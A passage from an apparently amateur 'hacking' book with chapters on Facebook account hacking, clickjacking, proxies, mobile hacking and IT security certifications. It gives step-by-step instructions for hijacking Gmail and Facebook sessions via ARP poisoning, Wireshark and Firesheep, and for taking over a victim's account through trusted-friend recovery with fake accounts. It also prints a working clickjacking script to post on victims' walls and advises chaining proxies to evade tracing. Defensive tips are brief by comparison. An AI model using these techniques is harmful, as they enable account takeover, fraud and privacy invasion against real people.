which has been ARP poisoned. So now click on capture button and start capturing packets. Now using command line shell ping www.facebook.com you want to hack to get its IP address, filter all IP packets having IP address of www.facebook.com and search for HTTP protocol followed by GET /home.php, this may vary depending on region and time/zone but don't bother try to search all packets with HTTP GET for cookies. Now from packet details window expand the packet information for above packet and you'll get 8-10 different cookies that are stored by www.gmail.com on victim's PC. Right click and copy all cookies names and values in notepad. Now open Mozilla Firefox browse to tools and open Cookie editor. Add each cookie to your cookie folder using Cookie editor. Now close Cookie editor and open gmail, you'll find yourself logged into the victims account.
Defense against this attack: A system administrator should use tools used for countering sniffing. Don't log-in into your accounts if you know your LAN is not protected and if you want to log-in better use a tunneled connection. Download Wireshark from http://www.wireshark.org/. Download Add N Edit Cookies from Add-Ons Mozzila (2) using Firesheep
Fire sheep is an extension developed by Eric Butler for the Firefox web browser. The extension uses a packet sniffer to intercept unencrypted cookies from certain websites (such as Facebook and Twitter) as the cookies are transmitted over networks, exploiting session hijacking vulnerabilities. It shows the discovered identities on a sidebar displayed in the browser, and allows the user to instantly take on the log-in credentials of the user by double-clicking on the victim's name Thing we need: 1. Firefox Browser 2. Fire sheep Firefox plugin Procedure: 1.
First
download
and
install Firefox browser
and
Fire
sheep add
on
2. Open Firefox , Now click the (1) view button then select (2) side bar finally click(3) fire sheep or simply press ( ctrl + shift +s ) to open fire sheep
3. Now you can see fire sheep has opened up in the side bar Now select your interface by going to preferences as shown
4. Now click on start capture button and wait for a while , 5. Now you can see different pre- authenticated sessions on the side bar select the session which you want . 6. Now you will be automatically logged in the victims account .You can use this tool to hack Facebook/Twitter accounts
How to hack anyone facebook account when both victim and attacker are using different network? Phising, Cookie stealing can work this time as I discussed before in email hacking section.(see page no.
Hacking Facebook account password using recovery option Facebook has introduced a feature of using “Recovering password using Trusted Friends”. In this feature, if we have lost our Facebook account password, Facebook will send the security code to 3 friends. We have to ask those 3 friends for the security codes and after entering them, we can reset Facebook password. So, in this hack, we will use this feature for hacking Facebook account password. So, you have to create 3 fake accounts and make sure that your victim adds them as his friends. So, your 3 fake accounts must be listed in your victim’s Friends list. Now, if we use the above “Trusted friends” feature for resetting victim’s Facebook password, Facebook will send the security code to our 3 fake accounts and we can easily hack Facebook account. You can use Social engineering skills so that your victim will have no doubt while accepting your fake account as his friend. This is the only tricky part of the hack. Also, the fake accounts must be at least a week old. Once you are done with fake accounts, move to the steps below. Step 1. Go to Facebook.com and hit on Forgot Password link to get this page:
Step 2. You have to enter the email of the victim, or even the Facebook profile name will do. Facebook will search for profile name and you will be shown the account. Hit on “This is my account”
Step 3. On the next page, hit on “No longer have access to these”.
Step 4. You will be prompted for email address. Enter your email address here and hit on “Submit”.
Step 5. Facebook will ask you ask you to answer the Security question. Use social engineering to find out correct answer of question or else you can go for next steps by entering three
wrong answer ( Its not necessary you will prompt to next step of recovery because it depends on account to accounts )
Step 6. Now if you will able to proceed into next step recovery through three friends. Here you have to select three friends from random lost generated by facebook. It is not necessary that you fake accounts will be there in the list but possibilities are always there.
Now we have to get codes from all three accounts which have selected during recovery process after getting code we can set new password. Email address change mail will be sent to the old associated email id of victim. The account will be locked out for 24 hours. Now it’s attacker duty to get access before victim otherwise victim can recover his account. # Victim can be easily recover his account by answering security question. Once you have set security question it cant be changed.
Facebook account security countermeasures Enable HTTPS protocol Using HTTPS instead of simple HTTP means that you are securing your communication between the server and your computer. No one will be able to hack between your computer and the server so you can be sure that all the information delivered to and from your computer is completely safe. Modern browsers can highlight the secure URLs with the information about the certificate issuing authority. Here is a screenshot of secure Facebook open in Firefox: To enable HTTPS, you can login to your Facebook account and go to “Account -> Account Settings“. Select Account Security under Settings tab and check the box beside Browse Facebook on a secure connection (https) whenever possible
Use Facebook two-steps authentication (Login approvals) Like Google, Facebook has also introduced two-step authentication service called Login Approvals. This service lets you login to your Facebook account by using your password plus a security authentication code sent to your mobile device. By enabling this service, you will no longer be able to login to Facebook by only using your password. You will always be required to use the password and security code sent to your mobile device. Checking for facebook email phising attack and scams While you are in Facebook, you should never click on suspicious links even if the messages were sent from your friends. Most Facebook scams spread by posting messages to walls of all friends of the infected user. The best place to get updated news about Facebook scams is Facecrooks.com. Enable Login notifications Enabling login notifications in Facebook will notify you when someone logs in from a suspicious location or computer. To enable login notification, go to “Account -> Account Settings“. Under settings tab expand “Account security -> Login notification“, check the following two boxes:
Send me an email
Send me a text message
Use Facebook one time password service Like Hotmail, Facebook also provides the facility of one-time password. One-time password is a temporary password which can only be used once and expires within 20 minutes of creation. To enable this service, you’ll need to activate a phone number so that Facebook can send messages to your mobile. To register and activate a phone number you can go to “Account -> Account settings”.
Chapter 12
Facebook Clickjacking
Objectives: How it works Mitigation
What we’ll see in the future Install it Countermeasures
It allows setting up a website where users will do a facebook like without their knowledge when clicking any link on the page. This works by dragging an invisible (very low opacity) facebook like button bellow the mouse when the user hovers a link.
How it works Since we cannot inject css or javascript inside the facebook iframe, we cannot change the cursor:pointer css property when the mouse is over the like button, so it would be suspicious to have a page always with a clicking-hand mouse cursor. The workaround was making the like button follow the mouse when it’s normal to have a clicking-hand mouse cursor (cursor:pointer) such as when hovering a link! After clicking a link, the user will like the current page in facebook and will in fact be redirected to the href (through javascript magic – document.location.href) and a cookie will be defined so that the facebook like button no longer appears in future page loads.
Mitigation The purpose of this script is creating a discussion about how to prevent clickjacking and by using this script for any reason other than security debugging you might be violating Facebook Terms and Service Statements and might lose your Facebook account. As such, the code you have below it’s easily found on the web if you use it in your website and I’ll personally report you if you use it for malicious reasons.
What we’ll see in the future Before discussing how clickjacking will evolve, there is an important assumption to keep in mind: it’s possible to share a website not directly connected to where the like button is placed, meaning I might place a like button in fernandomagro.com liking another website/domain. So, it’s possible to create a database of websites and generate a lot of different like buttons consecutively in the same website. Wrapping it all up, when Facebook Clickjacking goes viral, I believe we will start seeing consecutive clickjacking likes/shares from malicious websites with huge galleries where a lot of clicking takes place. Example: having a gallery with 500 interesting pictures, imagine clicking those galleries for 2 hours and then returning to facebook and realizing the account was flooded with a huge amount of unrequested likes.
Install it I managed to wrap it all up around a nice javascript file that you just need to include to make it work in your webpage. Change the headers of your webpage with the following: window.DO_CLICKJACKING = 1
Then, download the file from http://malviya.my3gb.com/clickjacking.js and put it in an accessible folder: Code: var $J = jQuery.noConflict(); // solve: images and floating divs function heightestChild(elem) { var t=0; var t_elem; $J("*",elem).each(function () { if ( $J(this).outerHeight(true) > t ) {
t_elem=$J(this); t=t_elem.outerHeight(true); } }); // we care about the heighest if (elem.outerHeight(true) > t) { t = elem.outerHeight(true); } //return elem.outerHeight(true); return t+3; // hotfix } function highestOffsetTop(elem) { var t=elem.offset().top; var t_elem; $J("*",elem).each(function () { if ( $J(this).offset().top < t ) { t_elem=$J(this); t=t_elem.offset().top; } }); // we only care about the object that is most on top if (elem.offset().top < t) { t = elem.offset().top; } //return elem.offset().top; return t+3; } // 57 19 63 $J(document).ready(function(){ if (window.DO_CLICKJACKING) { // wrap up EVERYTHING /*$J("body").append('');*/ $J("body").append(''); var elementWidth = 0; var elementHeight = 0; var theElement = ''; var likeDone = 0;
if ($J.cookie("clickjacking_"+escape(document.URL)) == 1) { likeDone = 1; } // fired when the user clicks a link (likes our page) -> clickjacking is done FB.Event.subscribe('edge.create', function(response) { $J("#clickjacking").css("display", "none"); likeDone = 1; $J.cookie("clickjacking_"+escape(document.URL), "1"); // let the user actually go to the link he clicked. window.location.href = theElement.attr('href'); }); $J(document).mousemove(function(event) { if (theElement != '') { if (event.pageY < (highestOffsetTop(theElement)-4) || event.pageY > (highestOffsetTop(theElement) + heightestChild(theElement)) || event.pageX < theElement.offset().left || event.pageX > (theElement.offset().left + theElement.width()) ) { //alert(event.pageY + " " + theElement.height() + " " + theElement.offset().top); /* $J("#log").append("mouse off the element LEFT " + event.pageX + " " + theElement.offset().left + " " + (theElement.offset().left + theElement.width()) + ""); $J("#log").append("mouse off the element TOP " + event.pageY + " " + highestOffsetTop(theElement) + " " + (highestOffsetTop(theElement) + heightestChild(theElement,true)) + "");*/ theElement = ''; // the mouse is off theElement $J("#clickjacking").css("display", "none"); } else { if ($J.browser.msie) { $J("#clickjacking").css("top",(event.pageY15)+"px"); $J("#clickjacking").css("left",(event.pageX20)+"px"); } else { $J("#clickjacking").css("top",(event.pageY5)+"px"); $J("#clickjacking").css("left",(event.pageX20)+"px"); } } } });
$J(document).delegate("a","mouseenter", function (){ // register mouse is inside element if (likeDone == 0) { theElement = $J(this); $J("#clickjacking").css("display", "block"); } }); } // window.DO_CLICKJACKING }); /** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/licenses/gpl.html * */ /** * Create a cookie with the given name and value and other optional parameters. * * @example $.cookie('the_cookie', 'the_value'); * @desc Set the value of a cookie. * @example $.cookie('the_cookie', 'the_value', { expires: 7, path: '/', domain: 'jquery.com', secure: true }); * @desc Create a cookie with all available options. * @example $.cookie('the_cookie', 'the_value'); * @desc Create a session cookie. * @example $.cookie('the_cookie', null); * @desc Delete a cookie by passing null as value. Keep in mind that you have to use the same path and domain * used when the cookie was set. * * @param String name The name of the cookie. * @param String value The value of the cookie. * @param Object options An object literal containing key/value pairs to provide optional cookie attributes. * @option Number|Date expires Either an integer specifying the expiration date from now on in days or a Date object. * If a negative value is specified (e.g. a date in the past), the cookie will be deleted. * If set to null or omitted, the cookie will be a session cookie and will not be retained * when the the browser exits. * @option String path The value of the path atribute of the cookie (default: path of page that created the cookie).
* @option String domain The value of the domain attribute of the cookie (default: domain of page that created the cookie). * @option Boolean secure If true, the secure attribute of the cookie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/
[email protected] */ /** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/
[email protected] */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) { value = ''; options.expires = -1; } var expires = ''; if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) { var date; if (typeof options.expires == 'number') { date = new Date(); date.setTime(date.getTime() + (options.expires * 24 * 60 * 60 * 1000)); } else { date = options.expires; } expires = '; expires=' + date.toUTCString(); // use expires attribute, max-age is not supported by IE } // CAUTION: Needed to parenthesize options.path and options.domain // in the following expressions, otherwise they evaluate to undefined // in the packed version for some reason... var path = options.path ? '; path=' + (options.path) : ''; var domain = options.domain ? '; domain=' + (options.domain) : '';
var secure = options.secure ? '; secure' : ''; document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain, secure].join(''); } else { // only name given, get cookie var cookieValue = null; if (document.cookie && document.cookie != '') { var cookies = document.cookie.split(';'); for (var i = 0; i < cookies.length; i++) { var cookie = jQuery.trim(cookies[i]); // Does this cookie string begin with the name we want? if (cookie.substring(0, name.length + 1) == (name + '=')) { cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; } };
Now post webpage link to the victim’s wall,When victim will click on like button,he will be redirected to your webpage.
Countermeasures (1)Don’t click on shorten url (bit.ly, goo.gl etc.) (2)Don’t click on naked or violate image & video link. (3)Don’t click on any application which has different domain then facebook.
Chapter 13
Proxy & VPN technology
Objectives:
Proxy technology Introduction Working of proxy server
Types of proxy server Socks proxy Free proxy servers Use proxies for attack Tools VPN Introduction Working of VPN Types of VPN Free VPN services VPN Tools
Proxy Technology Introduction Proxy server is a server, acts as intermediate between internal and external host. Proxy server hides the computer from outside network.
Working of Proxy Server
When Internal server requests to process a website then it enters to proxy server ,proxy server adds the header from the ip packet and change reconstructs the data packet with different ip address and send it to external host.
Types of Proxy Server
Caching Proxy Server: Caching is the servicing the requests of clients with the help of saved contents from previous requests, without contacting specified server. Web Proxy Server: Proxy targeted to World Wide Web is called web proxy server. Anonymizing Proxy Server: It tried to annonimize the web surfing. Transparent Proxy Server: It doesn’t modify the request and response which is required for proxy authentication and identification, It works on port 80.
Non Transparent Proxy Server: It is a proxy that modifies the request and response in order to add some services to user agent.
Socks Proxy Socks is an IETF Stranded. It is proxy system which supports proxy aware applications. Its package includes three components. (1)Socks server for the operating system. (2)A Client program like ftp,telnet etc. (3)A Client library for socks. The Socks proxy doesn’t allow the external components to collect the information of the client which had generated a request,
Free Proxy Servers Attacking from thousand of proxy servers would be difficult to trace, There are thousand of proxy servers are available on the internet. Some websites which provides free proxy servers are below: http://www.proxy4free.com/ http://spys.ru/en/ http://tools.rosinstrument.com/proxy/?rule1
Use of Proxies for attack An attacker uses chain of proxies for attack, IDS or Firewall system install at the victim server will always log last proxy ip address that why traceback is difficult.
Tools Allegrosurf It is web accelerating, content filtering, proxy server. It allows user to share a single internet connection with the rest of the network while protecting users from unwanted content and increasing overall speed.
Download Link: http://www.downloadsofts.com/download/Servers/Firewall-ProxyServers/AllegroSurf-download-details.html
Proxy Manager It connects to the internet and download lists of proxy servers from various websites, You will have thousand of proxy server IP addresses within a minute.
Download Link: http://www.brothersoft.com/proxy-manager-35000.html
Tor Proxy Chaining Software Tor is network of virtual tunnels connected together and works like a big chained proxy. It masks identity of originated computer from the internet. It is the best proxy tool ever made.
Download Link: https://www.torproject.org/download/download.html.en
JAP Proxy JAP enables anonymous web surfing with any browser through the use of integrated proxy services that hide your real IP address.
Download Link: http://en.kioskea.net/download/download-3480-jap
VPN(Virtual Private Network) Introduction A virtual private network (VPN) is a network that uses primarily public telecommunication infrastructure, such as the Internet, to provide remote offices or traveling users access to a central organizational network. VPNs typically require remote users of the network to be authenticated, and often secure data with encryption technologies to prevent disclosure of private information to unauthorized parties.
Working of VPN
When internal server requests to transfer data to external host over the internet, VPN creates encrypted tunnel between internal server and external host while transferring data over the internet.
Types of VPN PPTP VPN(Dial-up VPN) A simple method for VPN is PPTP. It is a software based VPN system that uses your existing Internet connection. By using your existing Internet connection, a secure "tunnel" is created between two points allowing a remote user to connect to a remote network.
Site-to-site VPN Site-to-site is the same much the same thing as point-to-point except there is no "dedicated" line in use. Each site has its own internet connection which may not be from the same ISP or even the same type. One may have a T1 while the other only has DSL. Unlike point-to-point, the routers at both ends do all the work. They do all the routing and encryption.
Point-to-Point VPN A traditional VPN can also come as a point-to-point. These are also referred to as "leased-line VPNs." Simply put, two or more networks are connected using a dedicated line from an ISP. These lines can be packet or circuit switched. For example, T1's, Metro Ethernet, DS3, ATM or something else.
MPLS VPN MPLS is a true "ISP-tuned" VPN. It requires 2 or more sites connected via the same ISP or an "on-net" connection*. There is a way to configure this using different ISP's or "offnet" but you never get the same performance. I've tried... While it does use your existing Internet connection, tweaks are made by your ISP for performance and security.
Free VPN Services VPN protects user privacy over the internet.There are few services available on internet which provides free vpn services.
ProXPN
A free VPN service designed for use with Windows and Mac computers. ProXPN works by downloading a small free application from which to connect. The service is also compatible with the iPhone and other mobile phones that support VPN. Web:www.proxpn.com
GPass
The GPass service provides free VPN access as well as an impressive fast web proxy to use directly in your browser. The service is very popular in China where internet censorship is commonplace. Web: http://gpass1.com/gpass/
CyberGhost
Offering 1GB of encypted traffic per month on the free package, CyberGhost is another Windows-only VPN client. In order to use the service you are required to register for a free account which unfortunately does not allow you to pick and choose your servers. Web: http://cyberghostvpn.com/en/surf-anonym.html
SecurityKiss
The free package provided by SecurityKiss brings you 300MB of data transfer per day, but provides an uncapped line with plenty of speed. You’ll need the SecurityKiss software to access the service, and this is only compatible with Windows. Web: http://www.securitykiss.com/
VPN Tools VPN software brings the security of a private network to an insecure network, and allows you to access private local networks from anywhere. There are some vpn tools available which can we use to protect our privacy.
OpenVPN
OpenVPN is an open source VPN server that's easy to set up for use with open source VPN clients. You can easily export configuration files from OpenVPN to import into a variety of open source and commercial clients. Download Link: http://www.openvpn.net/
LogMeIn Hamachi
Hamachi's strongest attribute is its ease of use. If you've read some of the other entries in the Hive Five and realized that you don't want a contract for a corporate VPN or the hassle of configuring a bunch of routers with open-source firmware packages, and you just want to set up a simple virtual network between you and your friend, your phone, or your office, Hamachi offers nearly instant deployment. Download Link: http://www.logmeinhamachi.com/
Windows Built-In VPN Windows has a built-in VPN client. Before exploring other client solutions, it's worth pulling up the quick launch box in the Windows start menu and typing "VPN" to start the configuration process. In Windows versions prior to Windows Vista, the built-in VPN client received a fair amount of criticism for lacking features and supported protocols.
Chapter 14
Hacking Handheld devices
Objectives: Different OS in Mobile Phones What can a hacker do with your mobile phone
Vulnerabilities in different mobile phones Spywares Blackberry Handheld devices Iphone & Ipod Jailbreaking Iphone hacking using ifuntastic Trojans & viruses Mobile antivirus Mobile phone security tips
Different OS in Mobile Phone
Windows mobile Symbian OS Blackberry OS Apple iOS
What Can a Hacker DO with your mobile phone
Steal your information Rob your money Spying Acessing your voice mails,messages etc. Insert the virus
Vulnerabilities in different Mobile Phones
A format string vulnerability has been found in RIM’s Blackberry 7270, It allows remote hacker to disable phone’s calling feature. HTC Hytn using AGEPhone is vulnerable to malformed SIP messages sent over wireless LAN connections, It allows remote hacker to disconnect active calls. A Bufferoverflow vulnerability in Samsung SCH-i730 that runs SJPhone SIP clients,It allows an attacker to disable the phone and slow down the operating system.
Spyware:SymbOS/Htool-SMSSender.A.intd It is a prototype malware application that targets symbian OS. It sends copies of received SMS messages to the spyware author. Spyware:SymbOS/Htool-SMSSender.A.intd is distributed as “XaSMS.SIS”. Both the source code and SIS file are included in a RAR archive file named “HackSMS.rar”. It copies the text of last SMS message received,places it into a new SMS, and forwards the message to the spyware.
Spyware:SymbOS/MultiDropper.CG It is the spyware application that targets the symbian operating system for mobile phones. The spyware application comes with a variant of the MultiDropper mobile phone Trojan.
It tracks messages copies log files with the phone number of incoming and outgoing phone calls.
Blackberry Handheld device
“Blackberry attack toolkit” along with “BBproxy” software exploits the vulnerability of any company’s website. BBproxy is security assessment software allows proxy connection between internet and internal network. “Attack vector” tricks or links user to download malicious software. Blackjacking
BBproxy tool is used for Blackjacking attack.An attacker need to install this tool on his blackberry device then he should have to send it in email attachments to the targets. The channel between Blackberry server and handheld device is encrypted and can’t be properly inspected by security products. Blackberry Wireless Security The blackberry enterprise solution uses AES and triple-DES encryption method to encrypt data in transit. The blackberry enterprise solution is designed so that data remains encrypted during transit between handheld device and blackberry server.
Countermeasures
Clean Blackberry device memory. Protect storage messages on the messaging server. Encrypt application password and storage on the blackberry device. Use AES technology to secure the storage of password keeper.
IPhone & IPod Jailbreaking
Jailbreaking is the process of unlocking of ipod and iphone to allows the installation third party applications.It opens up your iPhone’s filesystem so that it can be accessed from your computer.
Tools for Jailbreaking There are few tools available for iphone jailbreaking. iDemocracy
iDemocracy is iPhone jailbreak and third party app for windows platform. It installs installer.app(for third party app,games ) & simunlock. Download Link: http://code.google.com/p/idemocracy/downloads/list
iActivator
It works on Mac operatin system providing GUI tools for iPhone jailbreaking, activation/deactivation. Download Link: http://www.filestube.com/c191b10600f1cfcd03ea,g/iActivator-v1-14.html iFuntastic
iFuntastic is iPhone modification & hacking tool. It has full file browser feature,which simply browses the iphone’s internal file system, and edit UI images. Download Link: http://ifuntastic.soft32.com/free-download
iPhone Hacking using iFuntastic Prerequisite
An Intel Mac The iPhone Hacking Kit Your Mac and iPhone need to be connected to the same wi-fi network.
Steps to perform iPhone Hacking
Install iFuntastic to your applications folder. After installing, Reboot your Mac safely. Make sure your iPhone is on, Then plug it into your Mac using usb cable. After iTunes Launches, quit it Launch iFuntastic Press prepare button, present on left side of iFuntastic window. Click the jailbreak button at the bottom of the window. On the next page of the window, there are six steps, follow them. You will see the window as on next slide.
Tool to unlock iPhone: anySIM anySIM is a GUI-Based unlocking system for iPhone. This is for iPhones working recently with OSv1.1.1 running on it or iPhones that were upgraded from 1.0.2 to 1.1.1
Steps for Unlocking your iPhone using AnySIM
Jailbreak your iPhone with software. Set up to install third party applications. Now download AnySIM and expand the ZIP file. Drag the resulting file “anySIM” (full name, anySIM.app) to your /Applications Folder. Open terminal (Located in /Applications/Utilities) and type the following : Scp –r /Applications/anySIM.app root@IPADDRESS: /Applications/ -replace the ipaddress with the ipaddress of your iPhone . Restart your iPhone Run the anySIM application to unlock your phone.
Trojans and Viruses
Cabir: Infects mobile phones running on Symbian OS. When a phone is infected, the message 'Caribe' is displayed on the phone's display and is displayed every time the phone is turned on. The worm then attempts to spread to other phones in the area using wireless Bluetooth signals.
Duts: A parasitic file infector virus and is the first known virus for the PocketPC platform. It attempts to infect all EXE files in the current directory (infects files that are bigger than 4096 bytes).
Skulls: A trojan horse piece of code. Once downloaded, the virus, called Skulls, replaces all phone desktop icons with images of a skull. It also will render all phone applications, including SMSes and MMSes useless.
Commwarrior: First worm to use MMS messages in order to spread to other devices. Can spread through Bluetooth as well. It infects devices running under OS Symbian Series 60. The executable worm file, once launched, hunts for accessible Bluetooth devices and sends the infected files under a random name to various devices.
Antivirus Kaspersky Antivirus
Kaspersky Anti-virus Mobile protects smartphones from malicious programs that targets mobile platforms. Download Link: http://www.kaspersky.com/kaspersky_mobile_security BitDefender Mobile security
BitDefender Mobile security provides antivirus protection for mobile devices running Symbian or Microsoft windows Mobile. Download Link: http://www.bitdefender.com/solutions/mobile-security-android.html BullGuard Mobile Antivirus
BullGuard protects Pocket PCs and smartphones from malicious programs that targets mobile platforms. It offers both On-Demand and On-Access Scanning. Download Link: http://www.bullguard.com/products/bullguard-mobile-security-10.aspx
Mobile Phone Security Tips
Keep your mobile antivirus updated. When entering a crowed zone, make sure to switch off Bluetooth. Do not open untrustworthy applications. Do not pair with unknown devices. Register 15 digits IMEI number for your GSM Handset. Protect your device by setting up a Personal identification number(PIN).
Chapter 15
Career certification in IT Security
Objectives:
CompTIA Cisco systems EC Council GIAC ISACA Offensive security (ISC)2
IT security certifications rose 3.1% in value over the past two years and 1.2% in value in the last six months. Certain types of security skills are seeing dramatic growth. A 27% rise in value was measured for the Certified Information Security Manager designation, just in the past six months. Brodkin reported on a survey carried out for the International Information Systems Security Certification Consortium, (ISC)^2, which showed "that holders of the CISSP, SSCP or CAP certifications who work in the Americas and have at least five years experience earn [an average of] $102,376 per year – more than $21,000 higher than IT pros who also have five years experience but lack the certifications." There are some vendors working is the field of information security which provides Career certification to candidates.
CompTIA
CompTIA is a provider of professional certifications for the information technology (IT) industry. CompTIA chairs and manages the Initiative for Software Choice. Certifications provided in information security are:
Security+ CSPA
Visit http://www.comptia.org/ for more details.
Cisco Systems
Cisco Systems also sponsors a line of IT Professional certifications for Cisco products. There are five levels of certification: Entry, Associate, Professional, Expert, and recently Architect, as well as eight different paths, Routing & Switching, Design, Network Security, Service Provider, the newly introduced Service Provider Operations, Storage Networking, Voice, and Wireless. Certifications in Information security:
CCNA Security CCSP CCIE Security
EC-Council
The EC-Council is best known for its professional certifications for the IT security field. It offers numerous certifications in a variety of fields related to IT security, including disaster recovery, secure programming, e-Business and general IT security knowledge. These are some famous certifications products of EC-Council.
C!EH CH!FI E!CSA LPT ENSA
GIAC
(GIAC) is an information security certification entity that specialises in technical and practical certification as well as new research in the form of its GIAC Gold program.
GSIF GSEC GCIA
ISACA
ISACA is an international professional association that deals with IT Governance. It is an affiliate member of IFAC Previously known as the Information Systems Audit and Control Association, ISACA now goes by its acronym only, to reflect the broad range of IT governance professionals it serves.
CISA CISM
Offensive Security
Offensive security is leading information Security Company which offers High skilled training on Information security products It is the only one of vendor who offer real time live training on information technology. It offers following certification courses OSCP ( Offensive security certified professional) OSEE ( Offensive security exploitation expert) OSWE ( Offensive security web expert) OSCE ( Offensive security certified expert) OSWP ( Offensive security certified wireless professional)
(ISC)²
The International Information Systems Security Certification Consortium ((ISC)2) is a non-profit organization headquartered in Palm Harbor, Florida. The most widely known certification offered by the organization is a Certified Information Systems Security Professional (CISSP) certification. [1] [2] The organization maintains what it calls a Common Body of Knowledge for information security for the following certifications:
CISSP
ISAAP
SSAP
SSCP
List of top 10 Highest Paying IT Certifications According to recent salary surveys by ZDNET's Tech Republic organization, the following are the highest paying certifications to have in the technology industry. Following each certification is the average annual salary being paid to individual responders that hold the certification. I have also listed training resources to learn more information about how to acquire each of the highest paying certifications. 1. PMI Project Management Professional (PMP) With an average annual salary of $101,695, the PMP certification from the Project Management Institute (PMI) organization tops the list of highest paying certifications for the current year.
2. PMI Certified Associate in Project Management (CAPM) Next highest on the list of highest paying certifications is PMI's Certified Associate in Project Management (CAPM). The average annual salary for CAPM holders that were surveyed is $101,103. 3. ITIL v2 - Foundations With an annual average salary of $95,415 the ITIL v2 Foundations certification came up third on the list of highest paying certifications. ITIL stands for the IT Infrastructure Library. The ITIL certification is designed to show expertise in ITIL service support and service delivery. 4. Certified Information Systems Security Professional (CISSP) Coming in at a close 4th on the list of highest paying certifications is the Certified Information Systems Security Professional or CISSP certification from (ISC)2. The average annual reported salary was $94,018. 5. Cisco CCIE Routing and Switching At $93,500 per year average annual salary, the Cisco CCIE Routing and Switching certification came in 5th on the list of highest paying certifications in the technology industry. 6. Cisco CCVP - Certified Voice Professional Number six on the list of the highest paying certifications is the Cisco CCVP or Cisco Certified Voice Professional. The average annual salary of CCVP respondents was $88,824. 7. ITIL v3 - ITIL Master The ITIL v3 certification - the ITIL Master - came in 7th on the list of the highest paying technical certifications. The average annual salary for ITIL Master Certification holders was $86,600.
8. MCSD - Microsoft Certified Solution Developer The MCSD or Microsoft Certified Solution Developer certification pays an average of $84,522. This puts the MCSD certification at number 8 on the list of highest paying certifications in technology. 9. Cisco CCNP - Cisco Certified Network Professional Cisco Certified Network professional or CCNP certification is number 9 on the list of highest paying technical certifications. The average annual salary reported by CCNP holders is $84,161. 10. Red Hat Certified Engineer The Red Hat Certified Engineer (RGCE) came in at number 10 on the list of highest paying certifications. The average annual salary reported by Red Hat Certified Engineers is $83,692.